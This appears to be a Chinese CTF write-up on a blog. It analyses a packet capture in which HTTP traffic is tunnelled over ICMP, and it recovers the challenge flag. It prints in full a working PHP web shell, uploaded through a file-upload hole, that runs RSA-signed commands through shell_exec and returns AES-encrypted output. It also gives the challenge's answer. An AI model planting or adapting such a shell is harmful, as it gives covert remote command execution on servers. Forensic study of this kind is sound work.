20240911泰山杯初赛--temp

于 2024-09-15 02:35:55 发布
阅读量632 收藏 1
点赞数 2
文章标签: CTF 2024泰山杯 初赛 temp 流量分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CHUNJIUJUN/article/details/142268676
版权

Wireshark打开temp.pcap流量包,发现有很多ICMP协议包。
在这里插入图片描述

一些ICMP数据包较大,且可发现,明显在传输HTTP协议数据内容:

在这里插入图片描述

右键,【显示分组字节】,进一步分析这些HTTP数据:

GET /test.html HTTP/1.1 
Host: 192.168.11.1 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Connection: keep-alive 
Cookie: PHPSESSID=Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxNToiL3d3dy9pbmRleC5odG1sIjt9 
Upgrade-Insecure-Requests: 1 
If-Modified-Since: Tue, 19 Oct 2021 02:52:56 GMT 
If-None-Match: "110-5ceabc236d07e-gzip"

其中, 【Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxNToiL3d3dy9pbmRleC5odG1sIjt9】是一个路径: O:9:“PageModel”:1:{s:4:“file”;s:15:“/www/index.html”;} 。

继续看其他ICMP包(43676、43680),发现以下HTTP数据比较可疑:

POST /upload.php HTTP/1.1 
Host: 192.168.11.1 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Content-Type: multipart/form-data; boundary=---------------------------202049257429575872453803494412 
Content-Length: 1812 
Origin: http://192.168.11.1 
Connection: keep-alive 
Referer: http://192.168.11.1/test.html 
Cookie: PHPSESSID=Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxNToiL3d3dy9pbmRleC5odG1sIjt9 
Upgrade-Insecure-Requests: 1 
 
-----------------------------202049257429575872453803494412 
Content-Disposition: form-data; name="fileToUpload"; filename="message.php" 
Content-Type: application/x-php 
 
<?php
define('AES_256_ECB', 'aes-256-ecb');

if(!isset($_REQUEST['pub']))
    die("403 Forbiden");

if(!isset($_REQUEST['maybe_key']))
    die("403 Forbiden");

$publicKeyString = <<<PK
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6YEBA42r+mPDGi1JTSK9
3yszPBPEzj4D+hlamCt/RCelQgnOptkfpziGZ6J466N7/Y9N4iuNI6oPiohZXFmM
H4CAfdqRI0B7kIlB6UFBoZPTxUgIQof1aaNcu7u0a6Rd2YGtREEAWqQri2mpGikq
g8B3k75fFOGaxfV3HL07lwko15mbgyZdtGZwof3Bepp8DdkfmSEp3wygMy1Tygk7
sI4g1AA/7l+2VIEw/zrwSo5maG98CcKoTmMygBUeVOCB+YkGti4UBYUOcOCkWrBR
YSsCZNiSGuSwMkSw80RWPmMeTV7Zqzln6ho9LFkCnXyQ77yTNJJpA6J8O1MW/+j1
AwIDAQAB
-----END PUBLIC KEY-----
PK;

$publicKey = openssl_pkey_get_public(array($publicKeyString,$privateKeyPassphrase));

if (!$publicKey) {
    echo "Public key NOT OK\n";
}


$encryptedWithPrivate = base64_decode($_GET['pub']);
$encryption_key_temp = base64_decode($_GET['maybe_key']);

if (!openssl_public_decrypt($encryptedWithPrivate, $decryptedWithPublicFromPrivate, $publicKey,OPENSSL_PKCS1_PADDING)) {
    echo "Error decrypting with public key what was encrypted with private key\n";
}

if (!openssl_public_decrypt($encryption_key_temp, $encryption_key, $publicKey,OPENSSL_PKCS1_PADDING)) {
    echo "Error decrypting with public key what was encrypted with private key\n";
}

$cmd_output = shell_exec($decryptedWithPublicFromPrivate);

$encrypted = openssl_encrypt($cmd_output, AES_256_ECB, $encryption_key, 0);
echo $encrypted."\n";
 
-----------------------------202049257429575872453803494412 
Content-Disposition: form-data; name="submit" 
 
Upload Image 
-----------------------------202049257429575872453803494412--

很明显,这里利用文件上传漏洞,上传了一个message.php文件,该文件有以下功能:

[1] 接收2个参数: pub, maybe_key
[2] 解析RSA公钥
[3] 获取私钥
[4] shell_exec可以执行命令
[5] 将命令执行结果进行加密,并echo输出

在第82638个包中,发现提交了pub、maybe_key两个参数:

pub=tk3u9WK94x7LxdaowKMfiQwvFuoaxyQAaqXJ1A0yq3XPucT6xWqqsr0uiI/44/GrUeOmCYUZpRlpeeXNTjHFC7igOCEeWNCiyfyMQlOxYa1LHI3PrBe2IM/QA7e/onnVx18yGwO8GQhip0puGSe6/R2jmTlJLUINjI3iQlU9P+AEmJtMS8AaboYD+92vn/vjJ1hrZ8KeQz5bRlmM5YJ5P1tyQUUIv1TC+DTjvKKlxVJw1QWXD4J4AKnaMmP1ABmpKmGV2R8IPGyTyv7+1d7avOyPJWcnd/MLNLBLMvf4qgEVWABBT55F4n0vJt95+u3IUUF4ddFFq5vOUufFzjkCXA==

maybe_key=1OMeS6Nr/ncQOwvLezwrWkIumP2P17ZZFuN7UEeLjAU8uXw+XAfpFaUxMOmYfABrjTCsHhFhTrw8vEzmYgncN/d5kX+B7nzCZ3c6NuhRYvAoPZVqio3r1rs9N1pz4iIJQHJhyfOZIFYcuwY3wo8D8uJvpT6pfrXMewZZ1pjj8pnsU1oz3oW/09Xbf+WCNzOsNLGreFbxecMoS6CRb+MJLI+p9iDIgn5czfHWLS2iFRq64nl2gXIn4HrkaFk4i8bRVVO6ZNia5G5reTVKJfG+nSR7RSlEpe9ovZ0m+GB4+6ms1H7xnIOZMZ01jQPX5Ye9hlimZYZV1SZ31eM3eH3lzQ==

将此代入上面的PHP脚本,运行后,发现shell_exec执行的命令为: cat /flag

<?php
define('AES_256_ECB', 'aes-256-ecb');

$publicKeyString = "
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6YEBA42r+mPDGi1JTSK9
3yszPBPEzj4D+hlamCt/RCelQgnOptkfpziGZ6J466N7/Y9N4iuNI6oPiohZXFmM
H4CAfdqRI0B7kIlB6UFBoZPTxUgIQof1aaNcu7u0a6Rd2YGtREEAWqQri2mpGikq
g8B3k75fFOGaxfV3HL07lwko15mbgyZdtGZwof3Bepp8DdkfmSEp3wygMy1Tygk7
sI4g1AA/7l+2VIEw/zrwSo5maG98CcKoTmMygBUeVOCB+YkGti4UBYUOcOCkWrBR
YSsCZNiSGuSwMkSw80RWPmMeTV7Zqzln6ho9LFkCnXyQ77yTNJJpA6J8O1MW/+j1
AwIDAQAB
-----END PUBLIC KEY-----
";

$publicKey = openssl_pkey_get_public(array($publicKeyString,$privateKeyPassphrase));

if (!$publicKey) {
    echo "Public key NOT OK\n";
}

$pub = "tk3u9WK94x7LxdaowKMfiQwvFuoaxyQAaqXJ1A0yq3XPucT6xWqqsr0uiI/44/GrUeOmCYUZpRlpeeXNTjHFC7igOCEeWNCiyfyMQlOxYa1LHI3PrBe2IM/QA7e/onnVx18yGwO8GQhip0puGSe6/R2jmTlJLUINjI3iQlU9P+AEmJtMS8AaboYD+92vn/vjJ1hrZ8KeQz5bRlmM5YJ5P1tyQUUIv1TC+DTjvKKlxVJw1QWXD4J4AKnaMmP1ABmpKmGV2R8IPGyTyv7+1d7avOyPJWcnd/MLNLBLMvf4qgEVWABBT55F4n0vJt95+u3IUUF4ddFFq5vOUufFzjkCXA==";
$may = "1OMeS6Nr/ncQOwvLezwrWkIumP2P17ZZFuN7UEeLjAU8uXw+XAfpFaUxMOmYfABrjTCsHhFhTrw8vEzmYgncN/d5kX+B7nzCZ3c6NuhRYvAoPZVqio3r1rs9N1pz4iIJQHJhyfOZIFYcuwY3wo8D8uJvpT6pfrXMewZZ1pjj8pnsU1oz3oW/09Xbf+WCNzOsNLGreFbxecMoS6CRb+MJLI+p9iDIgn5czfHWLS2iFRq64nl2gXIn4HrkaFk4i8bRVVO6ZNia5G5reTVKJfG+nSR7RSlEpe9ovZ0m+GB4+6ms1H7xnIOZMZ01jQPX5Ye9hlimZYZV1SZ31eM3eH3lzQ==";
$encryptedWithPrivate = base64_decode($pub);
$encryption_key_temp = base64_decode($may);

if (!openssl_public_decrypt($encryptedWithPrivate, $decryptedWithPublicFromPrivate, $publicKey,OPENSSL_PKCS1_PADDING)) {
    echo "Error decrypting with public key what was encrypted with private key\n";
}

if (!openssl_public_decrypt($encryption_key_temp, $encryption_key, $publicKey,OPENSSL_PKCS1_PADDING)) {
    echo "Error decrypting with public key what was encrypted with private key\n";
}
var_dump($decryptedWithPublicFromPrivate);
$cmd_output = shell_exec($decryptedWithPublicFromPrivate);
var_dump($cmd_output); # cat /flag
$encrypted = openssl_encrypt($cmd_output, AES_256_ECB, $encryption_key, 0);
echo $encrypted."\n";

$aaa = "NoVE76T3Eet+Jp1yEfwCp/RE5iFmpR5o8I+rc7VABou6hxTwiyvn9ihSWX8WTsXC";
$bbb = openssl_decrypt($aaa, AES_256_ECB, $encryption_key, 0);
var_dump($bbb); # flag{9657096501b3077fbae7c6d0de1eb16f}

在后续的第82646个ICMP包中,发现了echo回显的flag。该flag也是被AES加密了的:

NoVE76T3Eet+Jp1yEfwCp/RE5iFmpR5o8I+rc7VABou6hxTwiyvn9ihSWX8WTsXC

将此代入上面的脚本中,进行AES解密,得到flag:

flag{9657096501b3077fbae7c6d0de1eb16f}
tacooo
关注
2021“安恒·泰山”山东省网络安全大赛 (1).rar
12-07
2021“安恒·泰山”山东省网络安全大赛 CTF 真题
阿里巴巴开发手册_阿里巴巴开发手册-泰山版_
10-02
《阿里巴巴开发手册_阿里巴巴开发手册-泰山版》是阿里巴巴集团为Java开发者提供的一份详尽的编程规范和最佳实践指南。这份手册旨在提高代码质量、提升团队协作效率,并且遵循了阿里巴巴内部的一系列成熟开发标准。...
泰山工作方法-如何成为行业精英
02-02
泰山工作方法】是一种高效的工作理念和实践策略,旨在帮助人们在职业生涯中提升技能,成为所在行业的精英。这种工作方法的核心在于系统性、专注力、持续学习和自我优化。以下是对这一方法的详细解读: 1. 系统...
开发手册-泰山.zip
06-19
《开发手册-泰山》是专为JAVA开发者设计的一份详尽指南,旨在提供全面的编程、设计、优化以及问题解决的指导。这份手册以其“泰山”版本命名,可能象征着其在JAVA开发领域的权威地位,犹如泰山之巅,高瞻远瞩。下面...
阿里java开发手册-泰山
09-25
最近,阿里的《Java开发手册》又更新了,这个版本历经一年的修炼,取名:《Java开发手册(泰山版)》正式出道。 正所谓无规矩不成方圆,在程序员的世界里,也存在很多规范,阿里出版的Java开发手册就是其中之一,从...
考研复习-英语二真题考试题集-带答案
09-14
英语二考研真题复习资料,带答案版
2024中美独角兽公司发展分析报告.pdf
09-14
全球各大洲独角兽企业分布、中美独角兽企业对比(数量、估值、新增及退榜情况、行业分布、所在城市)、
C++ 中的异步编程模型是什么
09-14
在C++中,异步编程模型是处理并发任务、提高程序性能和响应性的关键技术。以下是C++中实现异步编程的几种主要方式: 每种异步编程模型都有其适用场景和优缺点。选择合适的模型可以提高代码的可读性、可维护性和性能。随着C++标准的不断发展,异步编程模型也在不断进化,为开发者提供了更多的工具和选择。 在实际开发中,应根据具体需求选择合适的异步编程模型。例如,对于简单的异步任务,回调函数可能是最直接的选择;而对于需要结构化错误处理和结果获取的复杂异步任务,std::async和std::future可能更合适;在需要高效资源管理的场景下,线程池是一个不错的选择;而对于需要编写大量异步代码的现代应用程序,协程提供了一种更简洁、更直观的解决方案。 总之,C++中的异步编程模型是多核和高并发环境下提高程序性能的重要工具。通过合理使用这些模型,开发者可以构建出更高效、更可靠的软件系统。
正则表达式Regex是一种文本模式.docx
09-14
正则表达式(Regular Expression,简称Regex或Regexp)是一种文本模式,包括普通字符(例如,a 到 z 之间的字母)和特殊字符(称为"元字符")。正则表达式使用单个字符串来描述、匹配一系列符合某个句法规则的字符串。正则表达式是强大的文本处理工具,广泛用于搜索、编辑或操作文本和数据。 基本组成 普通字符:大多数字符,包括所有大写和小写字母、所有数字、所有标点符号和一些其他符号,都是普通字符。正则表达式中的普通字符表示它们自身。例如,正则表达式test会匹配字符串"test"。 特殊字符(元字符):一些字符在正则表达式中具有特殊的意义,如^、$、.、*、+、?、{、}、[、]、|、\等。这些特殊字符用于表示在搜索文本时要匹配的一个或多个字符。例如,.匹配除换行符之外的任何单个字符。 字符类:字符类允许你指定一组字符中的任何一个字符。例如,[abc]匹配"a"、"b"或"c"中的任意一个字符。你也可以使用范围,如[a-z]匹配任何小写字母。 预定义字符类:正则表达式提供了一些预定义字符类,用于匹配常见的字符集合。例如,\d匹配任何数字(等价于[0-9]),\s匹配任
基于struts+sqlserver网络购物系统毕业课程源码设计+论文资料
09-14
编号:150 系统功能: 展示网站最新的商品信息。 展示网站特价的商品信息。 为用户提供修改个人资料和查看在网站操作情况的平台。 提供用户在网站上购物的平台。 展示网站发布的公告信息。 展示商品的销量排行。 展示网站的友情链接信息。 对商品详细信息以及分类信息进行管理。 对用户基本资料、交易制度、消费情况及留言信息进行管理。 对用户提交的订单进行管理。 对管理员信息、网站公告信息、商业资讯信息及友情链接信息进行管理。 系统运行稳定,具有强大的数据处理能力。 操作注意事项 (1)本系统的用户名为:admin,密码为:admin (2)admin管理员的信息不能删除。 (3)用户注册登录后,可进行商品购买、商品信息查看以及订单查询操作。 (4)后台登陆地址:http://localhost:8080/WebShopping/bg-land.jsp。
基于ssm的高校毕业生就业管理系统设计与实现.docx
09-14
基于ssm的高校毕业生就业管理系统设计与实现.docx
退工、裁员培训讲义.ppt
09-14
退工、裁员培训讲义.ppt
认知实习decesion tree代码
最新发布
09-14
认知实习decesion tree代码
Java 算法:冒泡,选择,插入排序算法
09-14
Java 算法:冒泡,选择,插入排序算法
网约车出行预约系统数据库设计与数据操作
09-14
本课程设计旨在通过对网约车出行预约系统的数据库设计和数据操作的研究,提高对数据库系统的理解和应用能力。课程内容包括需求分析、数据库设计、数据操作等方面,通过实践操作,使掌握数据库设计的基本方法和技巧,提高实际操作能力。课程将从需求分析开始,明确网约车出行预约系统的功能需求和性能需求,为后续的数据库设计提供依据。接下来进行数据库设计,包括概念结构设计、逻辑结构设计和物理结构设计,确保数据库结构的合理性和高效性。在数据操作方面,将涵盖数据的增删改查、事务处理等内容,使学生能够熟练地进行数据操作和管理。通过理论教学和实践操作相结合的方式,使全面掌握网约车出行预约系统数据库设计和数据操作的方法和技巧,为今后从事相关领域的工作打下坚实的基础。
大学生竞赛管理系统代码系统 Springboot大学生竞赛管理系统,包括程序,中文注释,配置说明操作步骤
09-14
大学生竞赛管理系统-大学生竞赛管理系统-大学生竞赛管理系统-大学生竞赛管理系统-大学生竞赛管理系统-大学生竞赛管理系统-大学生竞赛管理系统-大学生竞赛管理系统-大学生竞赛管理系统-大学生竞赛管理系统-大学生竞赛管理系统-大学生竞赛管理系统 1、资源说明:大学生竞赛管理系统源码,本资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 2、适用人群:计算机相关专业(如计算计、信息安全、大数据、人工智能、通信、物联网、自动化、电子信息等)在校学生、专业老师或者企业员工等学习者,作为参考资料,进行参考学习使用。 3、资源用途:本资源具有较高的学习借鉴价值,可以作为“参考资料”,注意不是“定制需求”,代码只能作为学习参考,不能完全复制照搬。需要有一定的基础,能够看懂代码,能够自行调试代码,能够自行添加功能修改代码。 4. 最新计算机软件毕业设计选题大全(文章底部有博主联系方式): https://blog.csdn.net/2301_79206800/article/details/135931154 技术栈、环境、工具、软件: ① 系统环境:Windows ② 开发语言:Java
全球水草清除船行业总体规模、主要企业国内外市场占有率及排名(2024版).docx
09-14
全球水草清除船行业总体规模、主要企业国内外市场占有率及排名(2024版).docx
1999-2021年全国各地级市第一产业GDP数据
09-14
1999-2021年全国各地级市第一产业GDP数据 1、时间:1999-2021年 2、指标:第一产业GDP 3、来源:各省市NJ、地市统计J 4、范围:地级市(290个) 数据来源于网络整理。如有侵权请告知。
『人事流程图新』人力资源部工作流程 1.doc
09-14
『人事流程图新』人力资源部工作流程 1.doc
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值